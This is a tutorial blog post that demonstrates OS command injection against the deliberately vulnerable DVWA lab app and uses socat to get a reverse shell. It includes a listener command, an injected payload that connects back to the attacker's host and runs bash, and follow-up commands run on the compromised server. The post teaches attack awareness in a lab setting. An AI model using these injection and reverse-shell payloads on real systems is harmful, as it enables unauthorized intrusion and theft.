Create a reverse shell with Socat – DVWA OS Command Injections

socat reverse shell os command injection banner

In our Injection Attacks course, we perform different OS Command Injections to demonstrate how this vulnerability can be exploited in the Damn Vulnerable Web Application (DVWA). Then, we kick it up a notch and create a reverse shell with socat, a powerful tool similar to netcat but with additional functionality.

Getting the DVWA set up on Kali

If you’re here, chances are you already have the DVWA app running. If you don’t, though, here’s the fastest way to set it up.

We’ll also be using Kali Linux. If you don’t have that installed, here’s the quickest way to get it up and running.

Create a reverse shell with socat

On your host, in this case Kali, you will want to start a TCP listener. In this case, we use port 1337, but you can use a different port if you need to:

socat file:`tty`,raw,echo=0 tcp-listen:1337
socat TCP listener

Then, on the victim server, we want to connect to that port. To do that, I first need to figure out the IP address that it will connect to. So on your host, run this command in a different terminal window.

sudo ifconfig

In my case, I’m looking for eth0  and mine is:

10.0.2.15
Host INET IP

Now that I have it, I can inject this command in the application with the vulnerable input field:

; socat tcp-connect:10.0.2.15:1337 exec:bash,pty,stderr,setsid,sigint
Victim socat command injection


Verify the reverse shell connection

At this point, our connection should be established in the terminal window where we created the TCP listener, and we are now in the server (or in this case in the Docker container, but you get the point!).

We can run commands, like:

ls

We can navigate around…for example, I had created a text file whoami.txt for the lesson demonstration, so we could go find it and display its contents:

cd /var/www/html

ls

cat whoami.txt
Verify the reverse shell injection

We could read through the source code of the application, which would undoubtedly lead us to finding even more vulnerabilities, potentially some secrets, or potentially even modify the source code!

What now?

At this point, go ahead and have fun with the reverse shell since there’s a bunch of stuff you can do.

Then, once you are sufficiently terrified of the impact that OS Command injections can have on your applications and servers, enroll in our free course to learn how to defend your own apps against this type of attack. We also cover other types of devastating injections, like SQL injections.

Happy learning!

Related Articles

Responses

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.